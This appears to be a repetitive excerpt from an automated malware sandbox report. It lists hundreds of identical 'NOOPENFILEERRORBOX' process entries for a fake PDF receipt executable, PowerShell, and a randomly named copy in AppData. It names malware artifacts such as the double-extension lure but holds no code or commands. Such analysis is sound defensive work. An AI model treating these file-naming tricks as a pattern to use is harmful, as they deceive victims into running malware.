                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
